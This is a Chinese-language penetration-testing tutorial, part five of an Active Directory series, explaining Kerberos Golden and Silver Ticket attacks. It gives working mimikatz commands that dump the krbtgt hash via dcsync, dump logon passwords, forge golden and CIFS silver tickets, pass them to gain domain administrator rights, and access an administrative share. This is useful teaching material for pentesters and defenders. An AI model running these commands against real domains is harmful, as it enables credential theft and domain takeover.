域渗透入门（五）金票据、银票据

参考资料

• https://ldapwiki.com/wiki/Golden%20Ticket
• https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html#introduction-3
• https://www.cnblogs.com/wuxinmengyi/p/11768481.html
• https://www.youtube.com/watch?v=475V07I01J0

录制的视频教程

• 域渗透实践篇（六）黄金票据与白银票据

黄金票据

信息搜集

漏洞利用

#导出krbtgt的ntlm hash
mimikatz.exe "lsadump::dcsync /domain:0day.org /user:krbtgt" exit

#伪造黄金票据
mimikatz.exe "kerberos::golden /admin:Administrator /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2 /ticket:Administrator.kirbi" exit

#pass the ticket票据传递，获取域管理员权限
mimikatz.exe "kerberos::ptt Administrator.kirbi" exit

白银票据

信息搜集

/domain: The FDQN

/user: 要伪造的目标用户/计算机 Target Account/Computer to Impersonate
/ptt: Optional (Will Inject Ticket or you can do with Rubeus)
/service:cifs	服务参数为cifs
/domain    参数为域名
/sid	   参数为域sid (whoami /user)
/target    可能是目标计算机的主机名
/rc4       服务账号的ntml hash
/user      需要伪造的用户名  NTLM Hash of User Password/Computer Password

#生成了mimikatz.log文件
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

#伪造白银票据，伪造CIFS服务权限
mimikatz.exe "kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:OWA2010SP3.0day.org /service:CIFS /rc4:01832b04fa3aed862548241a387e3342 /user:Administrator /ptt" exit

dir \\OWA2010SP3\c$